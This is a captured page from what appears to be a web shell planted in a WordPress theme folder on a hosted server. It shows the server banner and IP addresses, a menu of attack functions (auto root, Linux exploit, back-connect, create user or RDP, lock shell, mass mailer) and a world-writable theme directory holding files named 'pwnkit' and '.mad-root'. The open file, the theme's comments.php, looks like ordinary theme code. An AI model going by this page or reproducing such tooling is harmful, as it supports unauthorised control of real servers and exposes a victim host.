Linux webm006.cluster127.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.127.20.6 | : 216.73.217.174
Cant Read [ /etc/named.conf ]
7.4.33
kvtechr
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
kvtechr /
www /
wp-content /
themes /
qwery /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxrwxrwx
front-page
[ DIR ]
drwxrwxrwx
images
[ DIR ]
drwxrwxrwx
includes
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
plugins
[ DIR ]
drwxrwxrwx
skins
[ DIR ]
drwxrwxrwx
theme-options
[ DIR ]
drwxrwxrwx
theme-specific
[ DIR ]
drwxrwxrwx
.htaccess
237
B
-rwxrwxrwx
.mad-root
0
B
-rw-r--r--
404.php
233
B
-rwxrwxrwx
blog.php
1.63
KB
-rwxrwxrwx
changelog.txt
3.33
KB
-rwxrwxrwx
comments.php
10.66
KB
-rwxrwxrwx
footer.php
2.8
KB
-rwxrwxrwx
front-page.php
1.14
KB
-rwxrwxrwx
functions-num-compiler.php
181.15
KB
-rwxrwxrwx
functions-num.php
181.15
KB
-rwxrwxrwx
functions.php
60.73
KB
-rwxrwxrwx
functions.php_bak
41.8
KB
-rwxrwxrwx
functions.txt
41.8
KB
-rwxrwxrwx
header.php
6.57
KB
-rwxrwxrwx
image.php
1.3
KB
-rwxrwxrwx
index.php
2.71
KB
-rwxrwxrwx
page.php
472
B
-rwxrwxrwx
pwnkit
0
B
-rwxr-xr-x
readme.txt
3.16
KB
-rwxrwxrwx
rtl.css
181.1
KB
-rwxrwxrwx
screenshot.jpg
88.33
KB
-rwxrwxrwx
sidebar-pic.php
0
B
-rwxrwxrwx
sidebar.php
2.85
KB
-rwxrwxrwx
single.php
5.36
KB
-rwxrwxrwx
style.css
4.69
KB
-rwxrwxrwx
style.css.map
1.76
KB
-rwxrwxrwx
style.scss
4.23
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comments.php
<?php /** * The template to display the Comments. * * The area of the page that contains both current comments * and the comment form. */ /* * If the current post is protected by a password and * the visitor has not yet entered the password we will * return early without loading the comments. */ if ( post_password_required() ) { return; } if ( ! function_exists( 'qwery_output_single_comment' ) ) { /** * Callback for output a single comment layout in the list of comment * depends of the comment type. * * @param object $comment A current comment object. * @param array $args Arguments to display layout. * @param int $depth A current depth of the comment. */ function qwery_output_single_comment( $comment, $args, $depth ) { switch ( $comment->comment_type ) { case 'pingback': ?> <li class="trackback"><?php esc_html_e( 'Trackback:', 'qwery' ); ?> <?php comment_author_link(); ?><?php edit_comment_link( esc_html__( 'Edit', 'qwery' ), '<span class="edit-link">', '<span>' ); ?> <?php break; case 'trackback': ?> <li class="pingback"><?php esc_html_e( 'Pingback:', 'qwery' ); ?> <?php comment_author_link(); ?><?php edit_comment_link( esc_html__( 'Edit', 'qwery' ), '<span class="edit-link">', '<span>' ); ?> <?php break; default: $author_id = $comment->user_id; $author_link = ! empty( $author_id ) ? get_author_posts_url( $author_id ) : ''; $author_post = get_the_author_meta( 'ID' ) == $author_id; $mult = qwery_get_retina_multiplier(); $comment_id = get_comment_ID(); ?> <li id="comment-<?php echo esc_attr( $comment_id ); ?>" <?php comment_class( 'comment_item' ); ?>> <div id="comment_body-<?php echo esc_attr( $comment_id ); ?>" class="comment_body"> <div class="comment_author_avatar"><?php echo get_avatar( $comment, 90 * $mult ); ?></div> <div class="comment_content"> <div class="comment_info"> <?php if ( $author_post ) { ?> <div class="comment_bypostauthor"> <?php esc_html_e( 'Post Author', 'qwery' ); ?> </div> <?php } ?> <h6 class="comment_author"> <?php echo ( ! empty( $author_link ) ? '<a href="' . esc_url( $author_link ) . '">' : '' ) . esc_html( get_comment_author() ) . ( ! empty( $author_link ) ? '</a>' : '' ); ?> </h6> <div class="comment_posted"> <span class="comment_posted_label"><?php esc_html_e( 'Posted', 'qwery' ); ?></span> <span class="comment_date"> <?php echo esc_html( get_comment_date( get_option( 'date_format' ) ) ); ?> </span> <span class="comment_time_label"><?php esc_html_e( 'at', 'qwery' ); ?></span> <span class="comment_time"> <?php echo esc_html( get_comment_date( get_option( 'time_format' ) ) ); ?> </span> </div> <?php // Show rating in the comment do_action( 'trx_addons_action_post_rating', 'c' . esc_attr( $comment_id ) ); ?> </div> <div class="comment_text_wrap"> <?php if ( 0 === $comment->comment_approved ) { ?> <div class="comment_not_approved"><?php esc_html_e( 'Your comment is awaiting moderation.', 'qwery' ); ?></div> <?php } ?> <div class="comment_text"><?php comment_text(); ?></div> </div> <div class="comment_footer"> <?php if ( 1 == $comment->comment_approved && qwery_exists_trx_addons() ) { ?> <span class="comment_counters"><?php qwery_show_comment_counters('likes,rating'); ?></span> <?php } $args['max_depth'] = apply_filters( 'qwery_filter_comment_depth', $args['max_depth'] ); if ( $depth < $args['max_depth'] ) { ?> <span class="reply comment_reply"> <?php comment_reply_link( array_merge( $args, array( 'add_below' => 'comment_body', 'depth' => $depth, 'max_depth' => $args['max_depth'], ) ) ); ?> </span> <?php } ?> </div> </div> </div> <?php break; } } } // Display a list of comments if ( ! qwery_sc_layouts_showed( 'comments' ) && ( have_comments() || comments_open() ) ) { qwery_sc_layouts_showed( 'comments', true ); $qwery_full_post_loading = qwery_get_value_gp( 'action' ) == 'full_post_loading'; $qwery_posts_navigation = qwery_get_theme_option( 'posts_navigation' ); $qwery_comments_number = get_comments_number(); $qwery_show_comments = qwery_get_value_gp( 'show_comments' ) == 1 || ( ! $qwery_full_post_loading && ( 'scroll' != $qwery_posts_navigation || qwery_get_theme_option( 'posts_navigation_scroll_hide_comments' ) == 0 || qwery_check_url( '#comments' ) ) ); $qwery_show_button = ! $qwery_show_comments || qwery_get_theme_option( 'show_comments_button' ) == 1; $qwery_open_comments = qwery_get_value_gp( 'show_comments' ) == 1 || ! $qwery_show_button || qwery_get_theme_option( 'show_comments' ) == 'visible' || qwery_check_url( '#comments' ); $qwery_msg_show = $qwery_comments_number > 0 ? wp_kses_data( sprintf( _n( 'Show comment', 'Show comments (%d)', $qwery_comments_number, 'qwery' ), $qwery_comments_number ) ) : wp_kses_data( __( 'Leave a comment', 'qwery' ) ); $qwery_msg_hide = wp_kses_data( __( 'Hide comments', 'qwery' ) ); do_action( 'qwery_action_before_comments' ); if ( $qwery_show_button ) { ?> <div class="show_comments_single"> <a href="<?php if ( $qwery_show_comments ) { echo '#'; } else { echo esc_url( add_query_arg( array( 'show_comments' => 1 ), get_comments_link() ) ); } ?>" class="<?php echo apply_filters( 'qwery_filter_comments_button_class', 'show_comments_button' ); if ( $qwery_show_comments && $qwery_open_comments ) { echo ' opened'; } ?>" data-show="<?php echo esc_attr( $qwery_msg_show ); ?>" data-hide="<?php echo esc_attr( $qwery_msg_hide ); ?>" > <?php if ( $qwery_show_comments && $qwery_open_comments ) { echo esc_html( $qwery_msg_hide ); } else { echo esc_html( $qwery_msg_show ); } ?> </a> </div> <?php } if ( $qwery_show_comments ) { ?> <section class="comments_wrap<?php if ( $qwery_open_comments ) { echo ' opened'; } ?>"> <?php if ( have_comments() ) { ?> <div id="comments" class="comments_list_wrap"> <h3 class="section_title comments_list_title"> <?php $qwery_post_comments = get_comments_number(); echo esc_html( $qwery_post_comments ); ?> <?php echo esc_html( _n( 'Comment', 'Comments', $qwery_post_comments, 'qwery' ) ); ?></h3> <ul class="comments_list"> <?php wp_list_comments( array( 'callback' => 'qwery_output_single_comment' ) ); ?> </ul> <?php if ( ! comments_open() && get_comments_number() != 0 && post_type_supports( get_post_type(), 'comments' ) ) { ?> <p class="comments_closed"><?php esc_html_e( 'Comments are closed.', 'qwery' ); ?></p> <?php } if ( get_comment_pages_count() > 1 ) { ?> <div class="comments_pagination"><?php paginate_comments_links(); ?></div> <?php } ?> </div> <?php } if ( comments_open() ) { ?> <div class="comments_form_wrap"> <div class="comments_form"> <?php $qwery_form_style = esc_attr( qwery_get_theme_option( 'input_hover' ) ); if ( empty( $qwery_form_style ) || qwery_is_inherit( $qwery_form_style ) ) { $qwery_form_style = 'default'; } $qwery_commenter = wp_get_current_commenter(); $qwery_req = get_option( 'require_name_email' ); $qwery_comments_args = apply_filters( 'qwery_filter_comment_form_args', array( // class of the 'form' tag 'class_form' => 'comment-form ' . ( 'default' != $qwery_form_style ? 'sc_input_hover_' . esc_attr( $qwery_form_style ) : '' ), // change the id of send button 'id_submit' => 'send_comment', // change the title of send button 'label_submit' => esc_html__( 'Leave a comment', 'qwery' ), // change the title of the reply section 'title_reply' => esc_html__( 'Leave a comment', 'qwery' ), 'title_reply_before' => '<h3 id="reply-title" class="section_title comments_form_title comment-reply-title">', 'title_reply_after' => '</h3>', // remove "Logged in as" 'logged_in_as' => '', // remove text before textarea 'comment_notes_before' => '', // remove text after textarea 'comment_notes_after' => '', 'fields' => array( 'author' => qwery_single_comments_field( array( 'form_style' => $qwery_form_style, 'field_type' => 'text', 'field_req' => $qwery_req, 'field_icon' => 'icon-user', 'field_value' => isset( $qwery_commenter['comment_author'] ) ? $qwery_commenter['comment_author'] : '', 'field_name' => 'author', 'field_title' => esc_html__( 'Name', 'qwery' ), 'field_placeholder' => esc_attr__( 'Your Name', 'qwery' ), ) ), 'email' => qwery_single_comments_field( array( 'form_style' => $qwery_form_style, 'field_type' => 'text', 'field_req' => $qwery_req, 'field_icon' => 'icon-mail', 'field_value' => isset( $qwery_commenter['comment_author_email'] ) ? $qwery_commenter['comment_author_email'] : '', 'field_name' => 'email', 'field_title' => esc_html__( 'E-mail', 'qwery' ), 'field_placeholder' => esc_attr__( 'Your E-mail', 'qwery' ), ) ), ), // redefine your own textarea (the comment body) 'comment_field' => qwery_single_comments_field( array( 'form_style' => $qwery_form_style, 'field_type' => 'textarea', 'field_req' => true, 'field_icon' => 'icon-feather', 'field_value' => '', 'field_name' => 'comment', 'field_title' => esc_html__( 'Comment', 'qwery' ), 'field_placeholder' => esc_attr__( 'Your comment', 'qwery' ), ) ), ) ); comment_form( $qwery_comments_args ); ?> </div> </div> <?php } ?> </section> <?php do_action( 'qwery_action_after_comments' ); } }
Close